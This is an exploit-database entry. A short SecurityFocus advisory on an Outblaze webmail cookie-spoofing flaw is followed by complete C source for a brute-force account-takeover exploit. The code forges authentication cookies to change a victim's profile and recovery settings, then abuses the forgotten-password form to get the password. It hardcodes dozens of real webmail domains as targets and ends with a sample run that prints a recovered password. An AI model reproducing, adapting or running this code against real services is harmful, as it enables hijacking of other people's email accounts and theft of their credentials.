source: http://www.securityfocus.com/bid/7115/info

Outblaze web mail service has been reported prone to an authentication cookie spoofing vulnerability.

This issue may allow a malicious attacker to bypass the cookie-based authentication mechanisms used by the affected Outblaze web mail server. If successful the attacker may obtain the victim's authentication credentials and gain full access to the victim's e-mail account.


/*
**
** Outblaze Web based e-mail User Cookie Spoofing 0day exploit
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
**
** Greets: INetCop(c) Security family, my friends.
*/
/*
** This exploit code is very simple, but is convenient.
** This can hack almost Outblaze Web based e-mail service. w00h00~!
**
** It may give password to you.
** Try about 20 times. When attack failed, retry.
** It may inform to you necessarily.
**
** This can test in Korean several sites but, I excluded it.
** Use in research !!!
** When abuse this, clear that there is no responsibility to us.
**
** P.S: Sorry, for my poor english.
*/

#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

#define X82 0x82
#define D_M 0
#define P_M 1
#define B_M 0x14
#define _B_SIZE 0x800

struct eat
{
	int num;
	char *mail_host;
	char *host_oa;
	char *word;
	char *domain;
};

struct eat vulns[]=
{
	{
	    	/* exploitable */
		0,"www.amrer.net",
		"amrer_net_oa",";",
		"amrer.net"
	},
	{
	    	/* exploitable */
	    	1,"www.amuro.net",
		"amuro_net_oa",";",
		"amuro.net"
	},
	{
	    	/* exploitable */
	    	2,"freemail.amuromail.com",
		"amuromail_com_oa",";",
		"amuromail.com"
	},
	{
	    	/* exploitable */
	    	3,"www.astroboymail.com",
		"astroboymail_com_oa",";",
		"astroboymail.com"
	},
	{
	    	/* exploitable */
	    	4,"www.dbzmail.com",
		"dbzmail_com_oa",";",
		"dbzmail.com"
	},
	{
	    	/* exploitable */
	    	5,"www.doramail.com",
		"doramail_com_oa",";",
		"doramail.com"
	},
	{
	    	/* exploitable */
	    	6,"www.glay.org",
		"glay_org_oa",";",
		"glay.org"
	},
	{
	    	/* exploitable */
	    	7,"www.jpopmail.com",
		"jpopmail_com_oa",";",
		"jpopmail.com"
	},
	{
	    	/* exploitable */
	    	8,"www.keromail.com",
		"keromail_com_oa",";",
		"keromail.com"
	},
	{
	    	/* exploitable */
	    	9,"www.kichimail.com",
		"kichimail_com_oa",";",
		"kichimail.com"
	},
	{
	    	/* exploitable */
	    	10,"www.norikomail.com",
		"norikomail_com_oa",";",
		"norikomail.com"
	},
	{
	    	/* exploitable */
	    	11,"www.otakumail.com",
		"otakumail_com_oa",";",
		"otakumail.com"
	},
	{
	    	/* exploitable */
	    	12,"mail.smapxsmap.net",
		"smapxsmap_net_oa",";",
		"smapxsmap.net"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	13,"www.uymail.com",
		"uymail_com_oa",";",
		"uymail.com"
	},
	{
	    	/* exploitable */
	    	14,"www.yyhmail.com",
		"yyhmail_com_oa",";",
		"yyhmail.com"
	},
	{
	    	/* exploitable */
	    	15,"mail.china139.com",
		"china139_com_oa",";",
		"china139.com"
	},
	{
	    	/* exploitable */
	    	16,"mymail.mailasia.com", /* mymail chk */
		"mailasia_com_oa","%3Amailasia.com;",
		"mailasia.com"
	},
	{
	    	/* exploitable */
	    	17,"www.aaronkwok.net",
		"aaronkwok_net_oa",";",
		"aaronkwok.net"
	},
	{
	    	/* exploitable */
	    	18,"mymail.bsdmail.com", /* mymail chk */
		"bsdmail_com_oa","%3Absdmail.com;",
		"bsdmail.com"
	},
	{
	    	/* exploitable */
	    	19,"mymail.bsdmail.com", /* mymail chk */
		"bsdmail_com_oa","%3Absdmail.org;",
		"bsdmail.org"
	},
	{
	    	/* exploitable */
	    	20,"www.ezagenda.com",
		"ezagenda_com_oa",";",
		"ezagenda.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	21,"www.fastermail.com",
		"fastermail_com_oa",";",
		"fastermail.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	22,"mail.wongfaye.com",
		"wongfaye_com_oa",";",
		"wongfaye.com"
	},
	{
	    	/* exploitable */
	    	23,"www.graffiti.net",
		"graffiti_net_oa",";",
		"graffiti.net"
	},
	{
	    	/* exploitable */
	    	24,"www.hackermail.com",
		"hackermail_com_oa",";",
		"hackermail.com"
	},
	{
	    	/* exploitable */
	    	25,"mail.kellychen.com",
		"kellychen_com_oa",";",
		"kellychen.com"
	},
	{
	    	/* exploitable */
	    	26,"www.leonlai.net",
		"leonlai_net_oa",";",
		"leonlai.net"
	},
	{
	    	/* exploitable */
	    	27,"mymail.linuxmail.org", /* mymail chk */
		"linuxmail_org_oa","%3Alinuxmail.org;",
		"linuxmail.org"
	},
	{
	    	/* exploitable */
	    	28,"mymail.outblaze.net", /* mymail chk */
		"outblaze_net_oa","%3Aoutblaze.net;",
		"outblaze.net"
	},
	{
	    	/* exploitable */
	    	29,"mymail.outblaze.net", /* mymail chk */
		"outblaze_net_oa","%3Aoutblaze.org;",
		"outblaze.org"
	},
	{
	    	/* exploitable */
	    	30,"mymail.outgun.com", /* mymail chk */
		"outgun_com_oa","%3Aoutgun.com;",
		"outgun.com"
	},
	{
	    	/* exploitable */
	    	31,"www.surfy.net",
		"surfy_net_oa",";",
		"surfy.net"
	},
	{
	    	/* exploitable */
	    	32,"mail.pakistans.com",
		"pakistans_com_oa",";",
		"pakistans.com"
	},
	{
	    	/* exploitable */
	    	33,"www.jaydemail.com",
		"jaydemail_com_oa",";",
		"jaydemail.com"
	},
	{
	    	/* exploitable */
	    	34,"mail.joinme.com",
		"joinme_com_oa",";",
		"joinme.com"
	},
	{
	    	/* exploitable */
	    	35,"www.marchmail.com",
		"marchmail.com",";",
		"marchmail.com"
	},
	{
	    	/* exploitable */
	    	36,"mail.nctta.org",
		"nctta_org_oa",";",
		"nctta.org"
	},
	{
	    	/* exploitable */
	    	37,"mail.portugalnet.com",
		"portugalnet_com_oa",";",
		"portugalnet.com"
	},
	{
	    	/* exploitable */
	    	38,"www.boardermail.com",
		"boardermail_com_oa",";",
		"boardermail.com"
	},
	{
	    	/* exploitable */
	    	39,"mymail.mailpuppy.com", /* mymail chk */
		"mailpuppy_com_oa","%3Amailpuppy.com;",
		"mailpuppy.com"
	},
	{
	    	/* exploitable */
	    	40,"www.melodymail.com",
		"melodymail_com_oa",";",
		"melodymail.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	41,"www.twinstarsmail.com",
		"twinstarsmail_com_oa",";",
		"twinstarsmail.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	42,"www.purinmail.com",
		"purinmail_com_oa",";",
		"purinmail.com"
	},
	{
	    	/* exploitable */
	    	43,"www.gundamfan.com",
		"gundamfan_com_oa",";",
		"gundamfan.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	44,"www.slamdunkfan.com",
		"slamdunkfan_com_oa",";",
		"slamdunkfan.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	45,"www.movemail.com",
		"movemail_com_oa",";",
		"movemail.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	46,"mail.startvclub.com",
		"startvclub_com_oa",";",
		"startvclub.com"
		/* shit, error hint answer form */
	},
	{
	    	/* exploitable */
	    	47,"www.ultrapostman.com",
		"ultrapostman_com_oa",";",
		"ultrapostman.com"
	},
	{
	    	/* exploitable */
	    	48,"mail.sailormoon.com",
		"sailormoon_com_oa",";",
		"sailormoon.com"
	},
	{
	    	X82,"x82.inetcop.org",
		NULL,NULL,NULL
	}
};

int target=D_M;
int sexsock(char *host);
int __make_xpl(char *__xploit_buf,char *tg_id,char *my_mail,int flag);
void re_connt(int sock);
void usage(char *x_name);
void banrl();
int g_pass_chk(char *buf,int size);

int main(int argc, char *argv[])
{
    	char pass_chk_st[]="This is your password: ";
    	int sock,whgo;
#define MAIL_ID "xploit"
	char m_id[X82]=MAIL_ID;
#define UR_MAIL_ADDRESS "xploit"
	char u_id[X82]=UR_MAIL_ADDRESS;
	u_char __x_buf[_B_SIZE];
	char __r_buf[_B_SIZE];
	memset((u_char *)__x_buf,D_M,sizeof(__x_buf));
	memset((char *)__r_buf,D_M,sizeof(__r_buf));

	(void)banrl();
	while((whgo=getopt(argc,argv,"t:i:m:h"))!=-P_M)
	{
	    	extern char *optarg;
		switch(whgo)
		{
			case 't':
			    	target=atoi(optarg);
				if(target>48)
				{
				    	(void)usage(argv[D_M]);
				}
				break;

		    	case 'i':
			    	memset((char *)m_id,D_M,sizeof(m_id));
				strncpy(m_id,optarg,sizeof(m_id)-P_M);
				break;

			case 'm':
				memset((char *)u_id,D_M,sizeof(u_id));
				strncpy(u_id,optarg,sizeof(u_id)-P_M);
				break;

			case 'h':
				(void)usage(argv[D_M]);
				break;

			case '?':
				fprintf(stderr,"Try `%s -h' for more information.\n",argv[D_M]);
				exit(-P_M);
				break;

		}
	}
	if(!strcmp(m_id,MAIL_ID)||!strcmp(u_id,UR_MAIL_ADDRESS))
	{
	    	(void)usage(argv[D_M]);
		exit(-P_M);
	}
	else
	{
	    	int bf;
		{
		    	fprintf(stdout," ============================================================\n");
		    	fprintf(stdout,"  ++ Cookie Spoofing Brute-force mode. ++\n\n");
			fprintf(stdout,"  [*] Connected to http://%s/.\n",vulns[target].mail_host);
			fprintf(stdout,"  [*] target mail address: %s@%s.\n",m_id,vulns[target].domain);
			fprintf(stdout,"  [*] Wait, getting password:\n");
		}
		for(bf=D_M;bf<B_M;bf++)
		{
    		    	sock=(int)sexsock(vulns[target].mail_host);
			(void)re_connt(sock);
			(int)__make_xpl(__x_buf,m_id,u_id,D_M);
			send(sock,__x_buf,strlen(__x_buf),D_M);
			memset((char *)__x_buf,D_M,sizeof(__x_buf));
			close(sock);

			sock=(int)sexsock(vulns[target].mail_host);
			(void)re_connt(sock);
			(int)__make_xpl(__x_buf,m_id,u_id,P_M);
			send(sock,__x_buf,strlen(__x_buf),D_M);
			recv(sock,__r_buf,sizeof(__r_buf)-P_M,D_M);
			close(sock);

			if(NULL!=(char *)strstr(__r_buf,pass_chk_st))
			{
			    	if(g_pass_chk((char *)strstr(__r_buf,pass_chk_st),
		    			    strlen((char *)strstr(__r_buf,pass_chk_st))))
				{
					fprintf(stdout,"  [*] Password sent out by your e-mail (%s).\n",u_id);
					break;
				}
				else
				{
				    	fprintf(stdout,"  [%02d] Use Brute-force mode, connect again ...\n",bf);
				}
			}
			else
			{
			    	fprintf(stdout,"  [%02d] Use Brute-force mode, connect again ...\n",bf);
			}
		}
		fprintf(stdout," ============================================================\n\n");
		exit(D_M);
	}
}

int __make_xpl(char *__xploit_buf,char *tg_id,char *my_mail,int flag)
{
    	/* It's my method */
    	char first_tg[]="/scripts/common/profile.cgi";
	char second_tg[]="/scripts/common/forgotpasswd.cgi";
#define LOGIN_SID "login=ff8eb9385445b9f3732c6945bb666024e859ddee6b71f87a&sid="
	char f_data[_B_SIZE];

	if(!flag)
	{
		memset((char *)f_data,D_M,sizeof(f_data));
		snprintf(f_data,sizeof(f_data)-P_M,
				"first_name=Happy-Exploit&last_name=Happy-Exploit&day_of_birth=1&"
				"month_of_birth=1&year_of_birth=1900&gender=male&country=KR&"
				"occupation=Professional&incomerange=40k&education=techschool&"
				"householdsize=3&icq_1=0&ac_address=%s&hint_q=vulnerable&hint_a=exploitable&%s",
				my_mail,(LOGIN_SID));
		memset((char *)__xploit_buf,D_M,_B_SIZE);
		snprintf(__xploit_buf,_B_SIZE-P_M,
				"POST %s HTTP/1.0\r\n"
				"Host: %s\r\n"
				"Cookie: test_cookie=; ob_cookies=%s%s %s=\r\n"
				"Content-type: application/x-www-form-urlencoded\r\n"
				"Content-length: %d\r\n\r\n"
				"%s\r\n\r\n",
				first_tg,vulns[target].mail_host,
				tg_id,vulns[target].word,
				vulns[target].host_oa,
				strlen(f_data),f_data);
	}
	else
	{
		switch(target)
		{
		    	case 16:
			case 27:
			case 30:
			    	memset((char *)f_data,D_M,sizeof(f_data));
				snprintf(f_data,sizeof(f_data)-P_M,
						"domain=%s&login=%s&first_name=Happy-Exploit&last_name=Happy-Exploit&"
						"year_or_birth=0&occupation=Professional&alternative_email=%s"
						"&hint_a=exploitable&answer_hq=SUBMIT",
						vulns[target].domain,tg_id,my_mail);
				break;

			case 18:
			case 19:
			case 28:
			case 29:
			case 39:
				memset((char *)f_data,D_M,sizeof(f_data));
				snprintf(f_data,sizeof(f_data)-P_M,
						"login=%s@%s&first_name=Happy-Exploit&last_name=Happy-Exploit&"
						"year_of_birth=0&occupation=Professional&alternative_email=%s"
						"&hint_a=exploitable&answer_hq=SUBMIT",
						tg_id,vulns[target].domain,my_mail);
				break;

			default:
				memset((char *)f_data,D_M,sizeof(f_data));
				snprintf(f_data,sizeof(f_data)-P_M,
						"login=%s&first_name=Happy-Exploit&last_name=Happy-Exploit&"
						"year_of_birth=0&occupation=Professional&alternative_email=%s"
						"&hint_a=exploitable&answer_hq=SUBMIT",
						tg_id,my_mail);
				break;
		}

		memset((char *)__xploit_buf,D_M,_B_SIZE);
		snprintf(__xploit_buf,_B_SIZE-P_M,
				"POST %s HTTP/1.0\r\n"
				"Host: %s\r\n"
				"Content-type: application/x-www-form-urlencoded\r\n"
				"Content-length: %d\r\n\r\n"
				"%s\r\n\r\n",
				second_tg,vulns[target].mail_host,strlen(f_data),f_data);
	}
}

int g_pass_chk(char *buf,int size)
{
	char passwd[X82];
	int sz_1_=D_M;
	memset((char *)passwd,D_M,sizeof(passwd));

	for(sz_1_=D_M;sz_1_<size
		&&!(buf[sz_1_+D_M]=='<'&&buf[sz_1_+P_M]=='/');sz_1_++)
	{
	    	passwd[sz_1_]=buf[sz_1_];
	}
	fprintf(stdout,"\n  %s\n\n",passwd);
	return(P_M);
}

int sexsock(char *host)
{
    	int sock;
	struct hostent *he;
	struct sockaddr_in x82;

	if((he=gethostbyname(host))==NULL)
	{
	    	return(-P_M);
	}
	if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-P_M)
	{
	    	return(-P_M);
	}
	x82.sin_family=AF_INET;
	x82.sin_port=htons(80);
	x82.sin_addr=*((struct in_addr *)he->h_addr);
	memset(&(x82.sin_zero),D_M,8);

	if(connect(sock,(struct sockaddr *)&x82,sizeof(struct sockaddr))==-P_M)
	{
	    	return(-P_M);
	}
	return(sock);
}

void re_connt(int sock)
{
    	if(sock==-P_M)
	{
	    	fprintf(stderr," [X] Connect Failed.\n");
		exit(-P_M);
	}
}

void usage(char *x_name)
{
    	int t=D_M;
    	fprintf(stdout," Usage: %s -option [argument]\n",x_name);
	fprintf(stdout,"\n\t-t [target num]     - target mail server.\n");
	fprintf(stdout,"\t-i [mail id]        - target mail id.\n");
	fprintf(stdout,"\t-m [mail addr]      - your mail address.\n");
	fprintf(stdout,"\t-h                  - help information.\n\n");
	fprintf(stdout," Select target mail number:\n\n");
	while(P_M)
	{
	    	if(vulns[t].num==X82)
		{
		    	break;
		}
		else fprintf(stdout," {%d} %s\n",vulns[t].num,vulns[t].domain);
		t++;
	}
	fprintf(stdout,"\n Example> %s -t 0 -i admin -m your_mail@mail.com\n\n",x_name);
	exit(-P_M);
}

void banrl()
{
    	fprintf(stdout,"\n Outblaze Web based e-mail User Cookie Spoofing 0day exploit\n");
	fprintf(stdout,"                                               by Xpl017Elz.\n\n");
}

/*
**
** Very Fun Result: --
**
** bash$ ./0x82-eat_outblaze_0dayxpl -t 24 -i tester -m attacker@testmail.com
**
**  Outblaze Web based e-mail User Cookie Spoofing 0day exploit
**                                                by Xpl017Elz.
**
**  ============================================================
**   ++ Cookie Spoofing Brute-force mode. ++
**
**   [*] Connected to http://www.hackermail.com/.
**   [*] target mail address: tester@hackermail.com.
**   [*] Wait, getting password:
**
**   This is your password: Happy-Exploit
**
**   [*] Password sent out by your e-mail (attacker@testmail.com).
**  ============================================================
**
** bash$
** --
**
** You can use other person's email through this.
**
*/